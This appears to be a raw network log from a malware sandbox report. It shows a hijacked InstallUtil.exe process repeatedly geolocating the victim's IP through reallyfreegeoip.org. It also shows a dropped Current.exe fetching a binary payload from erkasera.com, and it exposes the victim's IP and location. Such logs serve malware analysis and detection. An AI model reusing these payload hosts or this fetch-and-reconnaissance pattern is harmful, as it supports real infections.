                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SBkqO10E%2BDfSNsel934Eo8e9UI%2FWW5BPe5bywzSBo1D1OTy30CUNkooGlpB3u1HUSyGL9brH0azWyATg8v4u5kRvOc6yUaVLOJlg1RU1Dg9zhCqydVETTMzwsEh3KX8tqevXcyuu"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98325997f2cb2-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2019&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1425196&cwnd=251&unsent_bytes=0&cid=592f2d4287329531&ts=296&x=0"
                                                      2024-10-30 06:57:38 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:39 UTC | 63 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:57:39 UTC | 883 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:39 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19482
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWEYiQcOpRf3EEw8P7RYJTKEGmJFQptpQ24UwYCc3qRJ92PSF1iKOD5gFrIk1G3IqcWcFriPBDnbcOlUaF4Dv2BUnnVuvBoLBltDA0em1oahWTb%2BavhUBwUp6N%2B2svqtf3vgTOly"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9832b6b4f2cdb-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1845&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1556989&cwnd=251&unsent_bytes=0&cid=e05c2e6d3deb41bd&ts=158&x=0"
                                                      2024-10-30 06:57:39 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      3 | 192.168.2.5 | 49709 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:40 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:40 UTC | 891 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:40 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19483
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cs9KtJC4dbWvLkkkr8ok10LR5H4%2BALQ0SL4Ges%2FNrzmxnjZS6RjSBWUPzmeq3%2Bjhb%2BBbxKxEcmukGwPe%2BDqcmOq8pD68wM45ar%2Ff2FgKgEE7Gf4La2z2FFNhzZ89DJnQfOcOkEj0"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983346d166b29-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1029&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2765998&cwnd=251&unsent_bytes=0&cid=0f399a5d46c61685&ts=147&x=0"
                                                      2024-10-30 06:57:40 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      4 | 192.168.2.5 | 49711 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:41 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:42 UTC | 885 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:41 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19484
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j86EpcH%2BP1Us1rwfLGpHNpLN4QmAwPUD4%2FBnxGk7g0OT1cOkbaTj9eo4GnMotTWl1Xpq6%2BEl8Iprt5hUMiAp8D87td7BnaqdzTEgg5aHH6oPp8W3mcpa7d15NPJhmJVoS77g7tND"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9833d692f6bd4-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1076&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2635122&cwnd=251&unsent_bytes=0&cid=56aa48469f4aa89c&ts=146&x=0"
                                                      2024-10-30 06:57:42 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:43 UTC | 63 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:57:43 UTC | 887 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:43 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19486
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fYQeNladIU1%2BbCi7vemNnntDb0WpuP5BenE9aHiFUWwR3i5j5rNldX4oyS8FJpNlWSEjUFl8M0FpyauWozTtqSHVP%2F%2FfESAdc2gxDVwgXXDVhAMZtZqguL58qQTRAAxMwL%2F6uWN"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98346ad496c7c-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1835&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1643586&cwnd=247&unsent_bytes=0&cid=3fa92389d2e8c56e&ts=148&x=0"
                                                      2024-10-30 06:57:43 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.5 | 49715 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:44 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:44 UTC | 889 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:44 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19487
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JREZiKF7xpXJHWr6TNlfEzDRA0RC%2B%2Bj3Pk1aBFtkiVViFH85LGw3s4j9zz5UFIE%2FnIiGr1TABa%2BdqKUHjbeY7cNjXJBNqCVFMgHbIYLk%2F0zHR0PmNCXipX1LEhs1yjm0xAboNdgf"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9834fb91e6c39-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1930&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1495867&cwnd=235&unsent_bytes=0&cid=ddb879cf31c77403&ts=150&x=0"
                                                      2024-10-30 06:57:44 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      7 | 192.168.2.5 | 49717 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:46 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:46 UTC | 883 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:46 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19489
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FXMvm0Iq2Z4r2oVdSSwXVSWxR8YGJEwr4ONSs0YO7M59hXdafjNUHcMO5jyZgW8kspeX4frIunPqwRwZ0voXkQjcqC%2Bb9p9X8sdK21aeCzfTTlrHAab5yAW8pVK6sfCJDcKPijNt"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98358bedd4617-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1777777&cwnd=251&unsent_bytes=0&cid=8f77c2e3ee559658&ts=145&x=0"
                                                      2024-10-30 06:57:46 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      8 | 192.168.2.5 | 49720 | 188.114.96.3 | 443 | 2460 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:47 UTC | 87 | OUT | GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:47 UTC | 885 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:47 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19490
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H4WF6a3XZgFAQZcgBg1t41XaIePxThlmHrGaRHZW62V5zs%2FpXgjMNa%2BYiF%2F6n6V0iQfKI73ivTV6vgGgqZAvWlUy4y5Ylw3dXwgvnAskMjrQRlx4mth43GiQ6sqIhm17RHhws77p"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da98361ad11e75e-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1353&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2098550&cwnd=251&unsent_bytes=0&cid=72ca2aa0517d19a0&ts=151&x=0"
                                                      2024-10-30 06:57:47 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      9 | 192.168.2.5 | 49724 | 188.132.193.46 | 443 | 528 | C:\Users\user\AppData\Roaming\Current.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-10-30 06:57:51 UTC | 83 | OUT | GET /seuias/Mccudidikm.vdf HTTP/1.1
                                                      Host: erkasera.com
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:51 UTC | 207 | IN | HTTP/1.1 200 OK
                                                      Connection: close
                                                      content-type: application/octet-stream
                                                      last-modified: Tue, 29 Oct 2024 08:54:25 GMT
                                                      accept-ranges: bytes
                                                      content-length: 951304
                                                      date: Wed, 30 Oct 2024 06:57:30 GMT


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      10          192.168.2.5  49756        188.114.96.3    443               6204  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2024-10-30 06:57:56 UTC  87  OUT  GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:56 UTC  891  IN  HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:56 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19499
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XTY2O3WF6gjVXst7BbxOkwiqCAuyYa1W4pPY1n5U%2BRGiwL8%2F6pmkfjBLijmY2RcIGPm%2FV0hY2xkOkwKI%2FG59uQYeTGyQyZfx34n%2FFjeT1YAdbJ5l6PPqwiNjz2POP%2FaS5DZZ7PKL"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983991bfc316b-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2220858&cwnd=251&unsent_bytes=0&cid=52f392fdfd5178f8&ts=206&x=0"
                                                      2024-10-30 06:57:56 UTC  359  IN  Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      11          192.168.2.5  49765        188.114.96.3    443               6204  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2024-10-30 06:57:57 UTC  63  OUT  GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:57:57 UTC  893  IN  HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:57 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19500
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCaHTYfBNOK507rWMkbj3pvX9EVH2pIFttgPZN0SFelcfyB3%2F%2Fc3Rc1%2BwDMlAMHqq8L5QvUaR7wDnpqcrMkVFLFjNzt4jQUEUIwg%2Fo9C1U%2FT8dNq7kbe%2FsD7%2FV6z2h4jEehsZ0OF"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da9839ece65e53e-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1149&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2381578&cwnd=251&unsent_bytes=0&cid=c970beb5e3d5e547&ts=145&x=0"
                                                      2024-10-30 06:57:57 UTC  359  IN  Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      12          192.168.2.5  49773        188.114.96.3    443               6204  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2024-10-30 06:57:58 UTC  87  OUT  GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:57:59 UTC  887  IN  HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:57:59 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19502
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q2N%2FXDN0pSZw7T3zlwbeItBfm4BSzYuJK3jkAqXpkm%2FFsIMprR02BRTKT3ZynP1xReyKyO0l9TpSsR%2FPHzzKjV2DQB8OkbPER2mRbr6TDwAYq3z2xsL05SA6WeZIGVNpyjpZ%2BbGj"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983a7f9e33464-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1079&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2599640&cwnd=251&unsent_bytes=0&cid=3f086ae84aa95e66&ts=156&x=0"
                                                      2024-10-30 06:57:59 UTC  359  IN  Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      13          192.168.2.5  49785        188.114.96.3    443               6204  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2024-10-30 06:58:00 UTC  63  OUT  GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:58:00 UTC  887  IN  HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:00 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19503
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RM0Wyyb97mxKwU9I0PR2Y1ZKZ9wLLEv9W0sN%2FfZb%2B4Mde9yHU9X8IdIV97d68nWU4yEHLdO%2FhLCSHdBLVcg127Dw%2BaKFR8PepNQnI6Wbzk1BMUfLHaz2oiAqpLth7DUHBfl6iwqh"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983b0e8616b91-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1028&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2714151&cwnd=251&unsent_bytes=0&cid=1c6381fa952b165d&ts=148&x=0"
                                                      2024-10-30 06:58:00 UTC  359  IN  Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      14          192.168.2.5  49792        188.114.96.3    443               6204  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2024-10-30 06:58:01 UTC  87  OUT  GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:58:01 UTC  887  IN  HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:01 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19504
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FziQasjnh%2F4HbrE%2BQhBmRpJ6b9fYw16vleWSRIufnqvhrTE9%2FieLpwZiN99E0yklWfbtbstjTznr5MYNmU%2FKy4MhBFAzOVBinZkD7BeB1dQznQAA1ncG2FgoOkP9BvTZ0flLGRWb"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983ba0daa4864-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1640&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1776687&cwnd=249&unsent_bytes=0&cid=b24fce9a184b95fb&ts=150&x=0"
                                                      2024-10-30 06:58:01 UTC  359  IN  Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      15          192.168.2.5  49804        188.114.96.3    443               6204  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2024-10-30 06:58:03 UTC  63  OUT  GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      2024-10-30 06:58:03 UTC  887  IN  HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:03 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19506
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=meetUZSUXwY%2FxmcA0EA%2Fa6SMsvHb3EMt3x1EDApvChFifWLqXyS3NURg4HVzjNoHNIasZUN5iQbVSIxeHlUiDwy8mLLJC%2BGaP4oe0%2BbdQRYmKewRVmiG4GvgA0ZhAr7lhm6zGjra"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8da983c459666be0-DFW
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1802&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1531464&cwnd=251&unsent_bytes=0&cid=14527cd152017c5d&ts=148&x=0"
                                                      2024-10-30 06:58:03 UTC  359  IN  Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                      Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                      16          192.168.2.5  49816        188.114.96.3    443               6204  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      2024-10-30 06:58:04 UTC  87  OUT  GET /xml/173.254.250.78 HTTP/1.1
                                                      Host: reallyfreegeoip.org
                                                      Connection: Keep-Alive
                                                      2024-10-30 06:58:05 UTC | 887 | IN | HTTP/1.1 200 OK
                                                      Date: Wed, 30 Oct 2024 06:58:05 GMT
                                                      Content-Type: text/xml
                                                      Content-Length: 359
                                                      Connection: close
                                                      apigw-requestid: AcLvmhW3vHcESEw=
                                                      Cache-Control: max-age=31536000
                                                      CF-Cache-Status: HIT
                                                      Age: 19508
                                                      Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                      Accept-Ranges: bytes
